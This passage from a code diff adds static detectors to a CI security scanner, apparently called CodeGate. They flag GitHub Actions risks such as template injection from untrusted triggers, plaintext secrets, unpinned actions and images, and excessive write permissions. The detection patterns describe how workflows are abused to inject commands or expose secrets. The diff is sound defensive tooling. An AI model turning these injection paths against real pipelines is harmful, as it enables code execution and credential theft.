searchTerms: [found.value, "secrets."], + fallbackValue: found.value, + }); + + findings.push({ + rule_id: "workflow-secrets-outside-env", + finding_id: `WORKFLOW_SECRETS_OUTSIDE_ENV-${input.filePath}-${job.id}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: found.path }, + description: "Job references workflow secrets without a dedicated environment", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-522", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Use a dedicated environment for secrets-bound jobs or reduce the scope of secret exposure", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-self-hosted-runner.ts b/src/layer2-static/detectors/workflow-self-hosted-runner.ts new file mode 100644 index 0000000..6a3b3e9 --- /dev/null +++ b/src/layer2-static/detectors/workflow-self-hosted-runner.ts @@ -0,0 +1,86 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowSelfHostedRunnerInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function normalizeRunsOn(value: unknown): string[] { + if (typeof value === "string") { + return [value.trim()]; + } + + if (!Array.isArray(value)) { + return []; + } + + return value + .filter((entry): entry is string => typeof entry === "string") + .map((entry) => entry.trim()); +} + +function isSelfHostedRunner(value: unknown): boolean { + return normalizeRunsOn(value).some((entry) => entry.toLowerCase() === "self-hosted"); +} + +export function detectWorkflowSelfHostedRunner(input: WorkflowSelfHostedRunnerInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + const root = asRecord(input.parsed); + const jobsRecord = asRecord(root?.jobs); + if (!facts || !jobsRecord) { + return []; + } + + const findings: Finding[] = []; + + for (const job of facts.jobs) { + const jobRecord = jobsRecord[job.id]; + if (!isSelfHostedRunner(asRecord(jobRecord)?.["runs-on"])) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["self-hosted"], + fallbackValue: "runs-on: self-hosted", + }); + + findings.push({ + rule_id: "workflow-self-hosted-runner", + finding_id: `WORKFLOW_SELF_HOSTED_RUNNER-${input.filePath}-${job.id}`, + severity: "MEDIUM", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.runs-on` }, + description: "Job uses a self-hosted runner", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-732", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Prefer GitHub-hosted runners unless the workflow requires a hardened self-hosted trust boundary", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-stale-action-refs.ts b/src/layer2-static/detectors/workflow-stale-action-refs.ts new file mode 100644 index 0000000..8ab465b --- /dev/null +++ b/src/layer2-static/detectors/workflow-stale-action-refs.ts @@ -0,0 +1,230 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowStaleActionRefsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface RepositoryUseTarget { + raw: string; + owner: string; + repo: string; + ref: string; +} + +type FetchFn = typeof fetch; + +const staleActionCacheByFetch = new WeakMap>(); +const GITHUB_API_HEADERS = { + Accept: "application/vnd.github+json", + "User-Agent": "CodeGate", +} as const; +const MAX_TAG_PAGES = 10; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function isExternalRepositoryUse(value: string): boolean { + return value.startsWith("./") || value.startsWith("../") || value.startsWith("docker://"); +} + +function trimTrailingSlashes(value: string): string { + return value.replace(/\/+$/u, ""); +} + +function parseRepositoryUses(value: string): RepositoryUseTarget | null { + const trimmed = value.trim(); + if (trimmed.length === 0 || isExternalRepositoryUse(trimmed)) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimTrailingSlashes(trimmed.slice(0, atIndex).trim()); + const ref = trimmed.slice(atIndex + 1).trim(); + const [owner, repo] = slug.split("/"); + if (!owner || !repo || ref.length === 0) { + return null; + } + + return { + raw: trimmed, + owner: owner.toLowerCase(), + repo: repo.toLowerCase(), + ref, + }; +} + +function isCommitSha(ref: string): boolean { + return /^[a-f0-9]{40}$/iu.test(ref.trim()); +} + +async function commitPointsToTag(owner: string, repo: string, ref: string): Promise { + const fetchFn = globalThis.fetch; + if (typeof fetchFn !== "function") { + return false; + } + + let cache = staleActionCacheByFetch.get(fetchFn); + if (!cache) { + cache = new Map(); + staleActionCacheByFetch.set(fetchFn, cache); + } + + const normalizedRef = ref.toLowerCase(); + const cacheKey = `${owner}/${repo}@${normalizedRef}`; + const cached = cache.get(cacheKey); + if (cached !== undefined) { + return cached; + } + + try { + for (let page = 1; page <= MAX_TAG_PAGES; page += 1) { + const url = new URL( + `https://api.github.com/repos/${encodeURIComponent(owner)}/${encodeURIComponent(repo)}/tags`, + ); + url.searchParams.set("per_page", "100"); + url.searchParams.set("page", String(page)); + + const response = await fetchFn(url, { + headers: GITHUB_API_HEADERS, + }); + + if (!response.ok) { + cache.set(cacheKey, false); + return false; + } + + const payload = (await response.json()) as unknown; + if (!Array.isArray(payload)) { + cache.set(cacheKey, false); + return false; + } + + for (const tag of payload) { + const tagRecord = asRecord(tag); + const commitRecord = asRecord(tagRecord?.commit); + const tagSha = typeof commitRecord?.sha === "string" ? commitRecord.sha : undefined; + if (tagSha && tagSha.toLowerCase() === normalizedRef) { + cache.set(cacheKey, true); + return true; + } + } + + const linkHeader = response.headers.get("link") ?? ""; + if (!linkHeader.includes('rel="next"') || payload.length < 100) { + break; + } + } + } catch { + return false; + } + + cache.set(cacheKey, false); + return false; +} + +function gatherUsesTargets(parsed: unknown): Array { + const root = asRecord(parsed); + const jobsRecord = asRecord(root?.jobs); + if (!jobsRecord) { + return []; + } + + const targets: Array = []; + const addTarget = (uses: string, field: string): void => { + const parsedUses = parseRepositoryUses(uses); + if (parsedUses) { + targets.push({ + ...parsedUses, + field, + }); + } + }; + + for (const [jobId, jobValue] of Object.entries(jobsRecord)) { + const jobRecord = asRecord(jobValue); + if (!jobRecord) { + continue; + } + + if (typeof jobRecord.uses === "string") { + addTarget(jobRecord.uses, `jobs.${jobId}.uses`); + } + + const steps = Array.isArray(jobRecord.steps) ? jobRecord.steps : []; + steps.forEach((step, stepIndex) => { + const stepRecord = asRecord(step); + if (stepRecord && typeof stepRecord.uses === "string") { + addTarget(stepRecord.uses, `jobs.${jobId}.steps[${stepIndex}].uses`); + } + }); + } + + return targets; +} + +export async function detectWorkflowStaleActionRefs( + input: WorkflowStaleActionRefsInput, +): Promise { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + if (!extractWorkflowFacts(input.parsed)) { + return []; + } + + const targets = gatherUsesTargets(input.parsed); + const findings: Finding[] = []; + + for (const target of targets) { + if (!isCommitSha(target.ref)) { + continue; + } + + if (await commitPointsToTag(target.owner, target.repo, target.ref)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [target.raw, target.ref], + fallbackValue: target.raw, + }); + + findings.push({ + rule_id: "workflow-stale-action-refs", + finding_id: `WORKFLOW_STALE_ACTION_REFS-${input.filePath}-${target.field}`, + severity: "LOW", + category: "CI_VULNERABLE_ACTION", + layer: "L2", + file_path: input.filePath, + location: { field: target.field }, + description: "Workflow action reference pins a commit hash that does not resolve to a tag", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Pin the action to a commit hash that corresponds to a release tag, or document why the raw commit is required", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-superfluous-actions.ts b/src/layer2-static/detectors/workflow-superfluous-actions.ts new file mode 100644 index 0000000..965528b --- /dev/null +++ b/src/layer2-static/detectors/workflow-superfluous-actions.ts @@ -0,0 +1,93 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowSuperfluousActionsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function normalizeUses(value: string): string { + return value.trim().toLowerCase(); +} + +function isExternalUses(value: string): boolean { + const normalized = value.trim(); + return ( + normalized.length > 0 && + !normalized.startsWith("./") && + !normalized.startsWith("../") && + !normalized.startsWith("docker://") + ); +} + +export function detectWorkflowSuperfluousActions( + input: WorkflowSuperfluousActionsInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + const usesCounts = new Map(); + + job.steps.forEach((step, stepIndex) => { + const uses = step.uses?.trim(); + if (!uses || !isExternalUses(uses)) { + return; + } + + const key = normalizeUses(uses); + const current = usesCounts.get(key); + if (!current) { + usesCounts.set(key, { count: 1, firstStep: stepIndex, rawUses: uses }); + return; + } + current.count += 1; + }); + + for (const [key, value] of usesCounts.entries()) { + if (value.count < 2) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [value.rawUses], + fallbackValue: `${value.rawUses} repeated ${value.count} times`, + }); + + findings.push({ + rule_id: "workflow-superfluous-actions", + finding_id: `WORKFLOW_SUPERFLUOUS_ACTIONS-${input.filePath}-${jobIndex}-${key}`, + severity: "LOW", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${value.firstStep}].uses` }, + description: "Workflow repeats the same external action in a single job", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-1059", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Remove duplicate external action invocations unless repetition is explicitly required", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-template-injection.ts b/src/layer2-static/detectors/workflow-template-injection.ts new file mode 100644 index 0000000..2e049ec --- /dev/null +++ b/src/layer2-static/detectors/workflow-template-injection.ts @@ -0,0 +1,114 @@ +import sinkMap from "../workflow/injection-sinks.json" with { type: "json" }; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowTemplateInjectionInput { + filePath: string; + parsed: unknown; +} + +const UNTRUSTED_TRIGGERS = new Set([ + "pull_request", + "pull_request_target", + "issue_comment", + "discussion_comment", + "workflow_run", +]); + +function hasTemplateExpression(value: string | undefined): boolean { + return typeof value === "string" && value.includes("${{"); +} + +function normalizeUsesSlug(value: string): string { + const beforeRef = value.split("@")[0] ?? value; + return beforeRef.replace(/\/+$/u, "").toLowerCase(); +} + +export function detectWorkflowTemplateInjection(input: WorkflowTemplateInjectionInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const hasUntrustedTrigger = facts.triggers.some((trigger) => UNTRUSTED_TRIGGERS.has(trigger)); + if (!hasUntrustedTrigger) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + if (hasTemplateExpression(step.run)) { + findings.push({ + rule_id: "workflow-template-injection", + finding_id: `WORKFLOW_TEMPLATE_INJECTION-RUN-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_TEMPLATE_INJECTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: + "Template expression in run step may allow untrusted input to reach shell execution", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Move untrusted template expressions into validated environment variables before execution", + ], + evidence: step.run ?? null, + suppressed: false, + }); + } + + const uses = step.uses?.trim(); + if (!uses || !step.with) { + return; + } + const slug = normalizeUsesSlug(uses); + const sinkFields = (sinkMap as Record)[slug]; + if (!sinkFields || sinkFields.length === 0) { + return; + } + + for (const sinkField of sinkFields) { + const sinkValue = step.with[sinkField]; + if (!hasTemplateExpression(sinkValue)) { + continue; + } + + findings.push({ + rule_id: "workflow-template-injection", + finding_id: `WORKFLOW_TEMPLATE_INJECTION-SINK-${input.filePath}-${jobIndex}-${stepIndex}-${sinkField}`, + severity: "HIGH", + category: "CI_TEMPLATE_INJECTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].with.${sinkField}` }, + description: + "Template expression reaches an action input known to execute code or evaluate scripts", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid passing untrusted template expressions into code execution sink inputs", + ], + evidence: sinkValue, + suppressed: false, + }); + } + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-undocumented-permissions.ts b/src/layer2-static/detectors/workflow-undocumented-permissions.ts new file mode 100644 index 0000000..b04223d --- /dev/null +++ b/src/layer2-static/detectors/workflow-undocumented-permissions.ts @@ -0,0 +1,161 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUndocumentedPermissionsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function isWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value === "write" || value === "write-all"; + } + return false; +} + +function lineContaining(textContent: string, term: string): string | null { + const lines = textContent.split(/\r?\n/u); + for (const line of lines) { + if (line.includes(term)) { + return line; + } + } + return null; +} + +function hasLineComment(textContent: string, term: string): boolean { + const line = lineContaining(textContent, term); + return line ? line.includes("#") : false; +} + +function pushPermissionFinding( + findings: Finding[], + input: WorkflowUndocumentedPermissionsInput, + field: string, + evidenceTerm: string, + description: string, + permissionValue: string, +): void { + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [evidenceTerm, permissionValue], + fallbackValue: evidenceTerm, + }); + + findings.push({ + rule_id: "workflow-undocumented-permissions", + finding_id: `WORKFLOW_UNDOCUMENTED_PERMISSIONS-${input.filePath}-${field}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field }, + description, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-732", + confidence: "MEDIUM", + fixable: false, + remediation_actions: [ + "Document why elevated permissions are required or reduce the permission scope", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); +} + +export function detectWorkflowUndocumentedPermissions( + input: WorkflowUndocumentedPermissionsInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + if (typeof facts.workflowPermissions === "string") { + const value = facts.workflowPermissions.trim().toLowerCase(); + if ( + (value === "write-all" || value === "write") && + !hasLineComment(input.textContent, "permissions:") + ) { + pushPermissionFinding( + findings, + input, + "permissions", + `permissions: ${facts.workflowPermissions}`, + "Workflow defines elevated permissions without documenting why they are needed", + `permissions: ${facts.workflowPermissions}`, + ); + } + } else if (facts.workflowPermissions && typeof facts.workflowPermissions === "object") { + for (const [scope, value] of Object.entries(facts.workflowPermissions)) { + if (!isWritePermission(value)) { + continue; + } + const term = `${scope}: ${value}`; + if (hasLineComment(input.textContent, term)) { + continue; + } + pushPermissionFinding( + findings, + input, + `permissions.${scope}`, + term, + "Workflow defines elevated permissions without documenting why they are needed", + term, + ); + } + } + + facts.jobs.forEach((job) => { + if (typeof job.permissions === "string") { + const value = job.permissions.trim().toLowerCase(); + if (value === "write-all" && !hasLineComment(input.textContent, "permissions:")) { + pushPermissionFinding( + findings, + input, + `jobs.${job.id}.permissions`, + `permissions: ${job.permissions}`, + "Job defines elevated permissions without documenting why they are needed", + `permissions: ${job.permissions}`, + ); + } + return; + } + + if (!job.permissions || typeof job.permissions !== "object") { + return; + } + + for (const [scope, value] of Object.entries(job.permissions)) { + if (!isWritePermission(value)) { + continue; + } + + const term = `${scope}: ${value}`; + if (hasLineComment(input.textContent, term)) { + continue; + } + + pushPermissionFinding( + findings, + input, + `jobs.${job.id}.permissions.${scope}`, + term, + "Job defines elevated permissions without documenting why they are needed", + term, + ); + } + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-unpinned-images.ts b/src/layer2-static/detectors/workflow-unpinned-images.ts new file mode 100644 index 0000000..1060db5 --- /dev/null +++ b/src/layer2-static/detectors/workflow-unpinned-images.ts @@ -0,0 +1,141 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUnpinnedImagesInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface ImageTarget { + field: string; + image: string; +} + +const SHA256_DIGEST_RE = /@sha256:[a-f0-9]{64}$/iu; +const MUTABLE_LATEST_TAG = "latest"; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function getImageTag(image: string): string | null { + const trimmed = image.trim(); + if (trimmed.length === 0 || trimmed.includes("@")) { + return null; + } + + const lastSlash = trimmed.lastIndexOf("/"); + const lastColon = trimmed.lastIndexOf(":"); + if (lastColon <= lastSlash) { + return null; + } + + const tag = trimmed.slice(lastColon + 1).trim(); + return tag.length > 0 ? tag : null; +} + +function isShaPinned(image: string): boolean { + return SHA256_DIGEST_RE.test(image.trim()); +} + +function gatherImageTargets(parsed: unknown): ImageTarget[] { + const root = asRecord(parsed); + const jobsRecord = asRecord(root?.jobs); + if (!jobsRecord) { + return []; + } + + const targets: ImageTarget[] = []; + + for (const [jobId, jobValue] of Object.entries(jobsRecord)) { + const jobRecord = asRecord(jobValue); + if (!jobRecord) { + continue; + } + + const containerRecord = asRecord(jobRecord.container); + if (typeof containerRecord?.image === "string") { + targets.push({ + field: `jobs.${jobId}.container.image`, + image: containerRecord.image, + }); + } + + const servicesRecord = asRecord(jobRecord.services); + if (servicesRecord) { + for (const [serviceName, serviceValue] of Object.entries(servicesRecord)) { + const serviceRecord = asRecord(serviceValue); + if (typeof serviceRecord?.image === "string") { + targets.push({ + field: `jobs.${jobId}.services.${serviceName}.image`, + image: serviceRecord.image, + }); + } + } + } + } + + return targets; +} + +export function detectWorkflowUnpinnedImages(input: WorkflowUnpinnedImagesInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + if (!extractWorkflowFacts(input.parsed)) { + return []; + } + + const findings: Finding[] = []; + + for (const target of gatherImageTargets(input.parsed)) { + const trimmedImage = target.image.trim(); + if (trimmedImage.length === 0 || isShaPinned(trimmedImage)) { + continue; + } + + const tag = getImageTag(trimmedImage); + if (tag !== null && tag !== MUTABLE_LATEST_TAG) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [trimmedImage, "image:"], + fallbackValue: trimmedImage, + }); + + findings.push({ + rule_id: "workflow-unpinned-images", + finding_id: `WORKFLOW_UNPINNED_IMAGES-${input.filePath}-${target.field}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: target.field }, + description: + tag === MUTABLE_LATEST_TAG + ? "Workflow container image uses the mutable latest tag" + : "Workflow container image is not pinned to a SHA256 digest", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Pin container images to immutable sha256 digests instead of mutable tags", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-unpinned-uses.ts b/src/layer2-static/detectors/workflow-unpinned-uses.ts new file mode 100644 index 0000000..19f7b61 --- /dev/null +++ b/src/layer2-static/detectors/workflow-unpinned-uses.ts @@ -0,0 +1,77 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUnpinnedUsesInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function isPinnedToCommit(ref: string): boolean { + return /^[a-f0-9]{40}$/iu.test(ref.trim()); +} + +function isRepositoryUses(value: string): boolean { + return /^[a-z0-9._-]+\/[a-z0-9._-]+(?:\/[^@]+)?@[^\s]+$/iu.test(value.trim()); +} + +export function detectWorkflowUnpinnedUses(input: WorkflowUnpinnedUsesInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const uses = step.uses?.trim(); + if (!uses || uses.startsWith("./") || uses.startsWith("docker://")) { + return; + } + if (!isRepositoryUses(uses)) { + return; + } + + const ref = uses.split("@").slice(1).join("@").trim(); + if (ref.length === 0 || isPinnedToCommit(ref)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [uses], + fallbackValue: `uses: ${uses}`, + }); + + findings.push({ + rule_id: "workflow-unpinned-uses", + finding_id: `WORKFLOW_UNPINNED_USES-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].uses` }, + description: "Workflow action reference is not pinned to an immutable commit hash", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Pin external actions to a full commit SHA and track tag intent in comments", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-unredacted-secrets.ts b/src/layer2-static/detectors/workflow-unredacted-secrets.ts new file mode 100644 index 0000000..3c14769 --- /dev/null +++ b/src/layer2-static/detectors/workflow-unredacted-secrets.ts @@ -0,0 +1,124 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUnredactedSecretsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface SecretCandidate { + field: string; + key: string; + value: string; +} + +const SECRET_KEY_PATTERN = /(token|password|secret|api[_-]?key|private[_-]?key|access[_-]?key)/iu; +const REDACTED_VALUE_PATTERN = /^\s*\$\{\{\s*secrets\.[^}]+\}\}\s*$/iu; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function collectEnvSecrets( + envValue: unknown, + baseField: string, + candidates: SecretCandidate[], +): void { + const env = asRecord(envValue); + if (!env) { + return; + } + + for (const [key, value] of Object.entries(env)) { + if (!SECRET_KEY_PATTERN.test(key) || typeof value !== "string") { + continue; + } + const trimmed = value.trim(); + if (trimmed.length < 8 || REDACTED_VALUE_PATTERN.test(trimmed)) { + continue; + } + candidates.push({ + field: `${baseField}.${key}`, + key, + value: trimmed, + }); + } +} + +function gatherSecretCandidates(parsed: unknown): SecretCandidate[] { + const root = asRecord(parsed); + const candidates: SecretCandidate[] = []; + + collectEnvSecrets(root?.env, "env", candidates); + + const jobs = asRecord(root?.jobs); + if (!jobs) { + return candidates; + } + + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + if (!job) { + continue; + } + + collectEnvSecrets(job.env, `jobs.${jobId}.env`, candidates); + + const steps = Array.isArray(job.steps) ? job.steps : []; + steps.forEach((stepValue, stepIndex) => { + const step = asRecord(stepValue); + if (!step) { + return; + } + collectEnvSecrets(step.env, `jobs.${jobId}.steps[${stepIndex}].env`, candidates); + }); + } + + return candidates; +} + +export function detectWorkflowUnredactedSecrets(input: WorkflowUnredactedSecretsInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + return gatherSecretCandidates(input.parsed).map((candidate) => { + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [candidate.key, candidate.value], + fallbackValue: `${candidate.key} set to plaintext value`, + }); + + return { + rule_id: "unredacted-secrets", + finding_id: `UNREDACTED_SECRETS-${input.filePath}-${candidate.field}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2" as const, + file_path: input.filePath, + location: { field: candidate.field }, + description: "Workflow exposes a plaintext secret-like value in environment configuration", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-798", + confidence: "HIGH" as const, + fixable: false, + remediation_actions: [ + "Move secret material to GitHub encrypted secrets and reference it via ${{ secrets.* }}", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }; + }); +} diff --git a/src/layer2-static/detectors/workflow-unsound-condition.ts b/src/layer2-static/detectors/workflow-unsound-condition.ts new file mode 100644 index 0000000..490e6b4 --- /dev/null +++ b/src/layer2-static/detectors/workflow-unsound-condition.ts @@ -0,0 +1,123 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUnsoundConditionInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface StepCondition { + jobId: string; + stepIndex: number; + condition: string; + run?: string; + uses?: string; +} + +const SENSITIVE_COMMANDS = ["publish", "deploy", "release", "push"]; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function gatherStepConditions(parsed: unknown): StepCondition[] { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return []; + } + + const candidates: StepCondition[] = []; + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + const steps = Array.isArray(job?.steps) ? job.steps : []; + steps.forEach((stepValue, stepIndex) => { + const step = asRecord(stepValue); + const condition = typeof step?.if === "string" ? step.if : undefined; + if (!condition) { + return; + } + candidates.push({ + jobId, + stepIndex, + condition, + run: typeof step?.run === "string" ? step.run : undefined, + uses: typeof step?.uses === "string" ? step.uses : undefined, + }); + }); + } + + return candidates; +} + +function isAlwaysCondition(condition: string): boolean { + const normalized = condition.toLowerCase(); + return normalized.includes("always()"); +} + +function isSensitiveExecution(run: string | undefined, uses: string | undefined): boolean { + const runValue = run?.toLowerCase() ?? ""; + if (SENSITIVE_COMMANDS.some((token) => runValue.includes(token))) { + return true; + } + + return typeof uses === "string" && uses.trim().length > 0; +} + +export function detectWorkflowUnsoundCondition(input: WorkflowUnsoundConditionInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + for (const candidate of gatherStepConditions(input.parsed)) { + if ( + !isAlwaysCondition(candidate.condition) || + !isSensitiveExecution(candidate.run, candidate.uses) + ) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [candidate.condition, candidate.run ?? "", candidate.uses ?? ""], + fallbackValue: candidate.condition, + }); + + findings.push({ + rule_id: "workflow-unsound-condition", + finding_id: `WORKFLOW_UNSOUND_CONDITION-${input.filePath}-${candidate.jobId}-${candidate.stepIndex}`, + severity: "MEDIUM", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${candidate.jobId}.steps[${candidate.stepIndex}].if` }, + description: + "Workflow uses always() on a sensitive step, which can bypass expected failure gating", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-754", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Replace always() with explicit success and trust-boundary checks for sensitive steps", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-unsound-contains.ts b/src/layer2-static/detectors/workflow-unsound-contains.ts new file mode 100644 index 0000000..fba4546 --- /dev/null +++ b/src/layer2-static/detectors/workflow-unsound-contains.ts @@ -0,0 +1,115 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUnsoundContainsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface StepCondition { + jobId: string; + stepIndex: number; + condition: string; + run?: string; +} + +const PRIVILEGED_COMMANDS = ["publish", "deploy", "release", "gh release"]; +const UNTRUSTED_CONTAINS_PATTERNS = [ + /contains\s*\(\s*github\.event\.pull_request\.(?:title|body)/iu, + /contains\s*\(\s*github\.event\.comment\.body/iu, + /contains\s*\(\s*github\.event\.issue\.title/iu, +]; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} 